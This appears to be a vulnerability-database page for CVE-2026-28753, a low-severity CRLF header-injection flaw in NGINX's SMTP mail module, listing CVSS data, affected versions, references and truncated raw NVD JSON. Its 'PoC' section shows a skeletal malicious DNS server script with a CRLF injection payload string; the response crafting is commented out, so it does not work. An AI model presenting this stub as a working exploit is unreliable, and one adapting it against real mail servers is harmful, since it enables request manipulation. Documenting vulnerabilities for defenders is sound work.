CVE-2026-28753

Description

NGINX Plus and NGINX Open Source have a vulnerability in the ngx_mail_smtp_module module due to the improper handling of CRLF sequences in DNS responses. This allows an attacker-controlled DNS server to inject arbitrary headers into SMTP upstream requests, leading to potential request manipulation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:f5:nginx_plus:r32:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:nginx_plus:r32:p2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:nginx_plus:r32:p3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:nginx_plus:r32:p4:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:nginx_plus:r33:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:nginx_open_source:*:*:*:*:*:*:*:* - VULNERABLE

NGINX Open Source (具体受影响版本请参考官方公告)

NGINX Plus (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Conceptual PoC for CVE-2026-28753
# This script simulates a malicious DNS server that responds with
# a payload containing CRLF sequences to exploit the vulnerability.

# Malicious payload with CRLF injection
injected_headers = "\r\nX-Injected-Header: Attacker-Controlled\r\n"

def start_dns_server():
    # Create a UDP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", 53))
    print("[+] Malicious DNS server listening on port 53...")

    try:
        while True:
            data, addr = sock.recvfrom(1024)
            print(f"[+] Received query from {addr}")
            
            # In a real exploit, the attacker would craft a valid DNS response
            # where the domain name or TXT record contains the CRLF sequence.
            # Below is a simplified representation of the logic.
            
            # Constructing a malicious response (Conceptual)
            # The vulnerability triggers when NGINX parses the response.
            # response_payload += injected_headers 
            
            # Send response (Actual DNS crafting required for execution)
            # sock.sendto(response_payload, addr)
            pass
    except KeyboardInterrupt:
        sock.close()

if __name__ == "__main__":
    start_dns_server()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28753
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28753
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28753/
[4] VulDB https://vuldb.com/cve/CVE-2026-28753
[5] https://my.f5.com/manage/s/article/K000160367

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28753", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:33.560", "lastModified": "2026-03-26T21:15:24.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NGINX Plus and NGINX Open Source have a vulnerability in the ngx_mail_smtp_module module due to the improper handling of CRLF sequences in DNS responses. This allows an attacker-controlled DNS server to inject arbitrary headers into SMTP upstream requests, leading to potential request manipulation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}, {"lang": "es", "value": "NGINX Plus y NGINX Open Source tienen una vulnerabilidad en el módulo ngx_mail_smtp_module debido al manejo inadecuado de secuencias CRLF en las respuestas DNS. Esto permite a un servidor DNS controlado por el atacante inyectar encabezados arbitrarios en las solicitudes upstream SMTP, lo que lleva a una posible manipulación de solicitudes. Nota: Las versiones de software que han alcanzado el Fin de Soporte Técnico (EoTS) no son evaluadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p1:*:*:*:*:*:*", "matchCriteriaId": "FA913184-EAAD-409E-99C6-AB979DAA93F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p2:*:*:*:*:*:*", "matchCriteriaId": "782DF180-1101-4D6A-A1D7-8DADBAF6D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p3:*:*:*:*:*:*", "matchCriteriaId": "FB0B11F2-4748-492B-9906-F8C4C5EAFF12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r32:p4:*:*:*:*:*:*", "matchCriteriaId": "86B53968-1CCA-4CF3-8454-BB92EF64D10E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:*:*:*:*:*:*:*", "matchCriteriaId": "4F58BD02-EA76-4F32-87D6-430026C8553E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p1:*:*:*:*:*:*", "matchCriteriaId": "46DC49B8-7286-4867-9CDA-1C1B469CD304"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p2:*:*:*:*:*:*", "matchCriteriaId": "43477C2E-7485-4146-B25C-F58D632CD85B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r33:p3:*:*:*:*:*:*", "matchCriteriaId": "6A25B9CF-02C0-42DE-9C70-F2AD3ACE3CEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r34:*:*:*:*:*:*:*", "matchCriteriaId": "86358605-55F9-4F6F-846A-3F48738F6E05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r34:p1:*:*:*:*:*:*", "matchCriteriaId": "7453D683-FCA7-46EE-BE49-5FD9A01D7F87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r34:p2:*:*:*:*:*:*", "matchCriteriaId": "A977BF9F-D165-4B93-B4D2-A177883A5E75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_plus:r35:*:*:*:*:*:*:*", "matchCriteriaId": "C643CEF2-F421-4E2C-AD39-51CE820F2238"}, {"vul ... (truncated)